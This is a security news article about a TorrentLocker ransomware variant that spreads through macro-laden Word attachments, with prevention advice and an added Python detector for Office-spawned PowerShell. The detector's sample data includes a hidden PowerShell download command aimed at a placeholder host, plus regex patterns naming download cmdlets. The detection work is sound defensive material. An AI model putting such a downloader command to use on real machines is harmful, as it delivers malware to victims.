TorrentLocker returned with a vengeance and an enhanced arsenal. The ransomware deployed two large scale attacks in Denmark within a few days. Upon analyzing the new variant of the program, researchers at Heimdal Security made concerning discoveries.
The malware analysts found that TorrentLocker has gone through significant improvements. The ransomware now has the ability to steal user names and passwords. This widens the threat spectrum: victims now also have to worry about their personal accounts being hijacked.
The developers of TorrentLocker have also worked on improving the distribution rate of the ransomware. The program can copy itself to other machines through shared files, which makes it possible for TorrentLocker to spread across an entire computer network rather than a single device.
While we are on the topic of distribution, we might as well explain how the ransomware is spread. According to the Heimdal researcher team, the virus travels with Microsoft Word documents. The distributors use spam emails.
On another note, the download and installation of TorrentLocker on the targeted computer is triggered by a malicious macro. When you open the document, its content appears unreadable and you are asked to enable the macro. Clicking the “Enable Editing” button results in PowerShell code being executed. PowerShell is a powerful Windows scripting environment and, as such, it can download and install programs.
The good news is that users get a second chance to avoid the infection. Even if they are tricked into downloading the file, they can still block the virus by denying the request to run the macro.
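The process chain described above (Word document, enabled macro, PowerShell downloader) is exactly what endpoint telemetry can catch. The following is an added example, not code from the article or from Heimdal: a Python checker over constructed, Sysmon-style process-creation records that flags an Office application spawning PowerShell and notes hidden-window, encoded-command or download indicators in its command line. Image paths, command lines and the URL are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Office hosts that should normally never launch a shell, and the shells to watch for.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of a macro-launched downloader stage.
SUSPICIOUS_ARGS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(nc|ncodedcommand)?\s", re.I), "encoded command"),
    (re.compile(r"downloadfile|downloadstring|invoke-webrequest", re.I), "download cmdlet"),
]


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the new process image
    command_line: str   # command line of the new process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: ProcessEvent) -> list[str]:
    """Return the reasons the event matches the macro-to-PowerShell chain; empty if it does not."""
    if basename(event.parent_image) not in OFFICE_IMAGES or basename(event.image) not in SHELL_IMAGES:
        return []
    reasons = ["Office application spawned PowerShell"]
    reasons += [label for pattern, label in SUSPICIOUS_ARGS if pattern.search(event.command_line)]
    return reasons


def find_alerts(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Pair every suspicious event with its reasons."""
    return [(e, assess(e)) for e in events if assess(e)]


# Constructed sample telemetry: Word opening a document, Word spawning a hidden
# PowerShell downloader, and a legitimate PowerShell run by the user's shell.
OFFICE = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe", OFFICE, '"WINWORD.EXE" /n "C:\\Users\\alice\\Downloads\\invoice.doc"'),
    ProcessEvent(OFFICE, PS, "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                 "\"(New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/stage', ...)\""),
    ProcessEvent("C:\\Windows\\explorer.exe", PS, "powershell.exe -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for event, reasons in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT: {basename(event.image)} <- {basename(event.parent_image)}: {', '.join(reasons)}")
```

The same parent/child rule is what a Sysmon or EDR correlation would express; the command-line indicators only raise the confidence of a hit, they are not required for one.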
The detection levels for TorrentLocker were low at the start. The VirusTotal online service reported a detection rate of 3/55. The actual numbers may be much higher, though, since the online scanner does not work like a desktop anti-virus application.
Heimdal addressed the detection aspect in their blog post on TorrentLocker: “These spam waves are very aggressive, so please be extra cautious with protecting your inbox and carefully evaluate which emails you open. A similar spam wave spreading TorrentLocker as well still achieves a rather low detection rate, even 4 days after it was discovered: 19/56 on VirusTotal.”
Prevention is the key when it comes to viruses
The best way to deal with cyber infections is to avoid contracting them in the first place. As we already mentioned, the latest build of TorrentLocker uses spam emails as a propagation vector. This is the most common way for ransomware to be spread.
Spam campaigns are as intense as ever, so you should verify the legitimacy of every email you receive. Check even when the sender looks familiar: spammers often write on behalf of legitimate entities to lead people astray. Do not be in a hurry to open a document, however important it may appear to be. Finally, never agree to bypass the security features of your email client or Office applications; if the attached file were harmless, that would be unnecessary.
There are decryption tools for past variants of TorrentLocker. They have yet to be tested with the new version of the virus. We will have to wait before we find out whether the program can be decrypted with the existing tools, or if a new decrypter will need to be developed.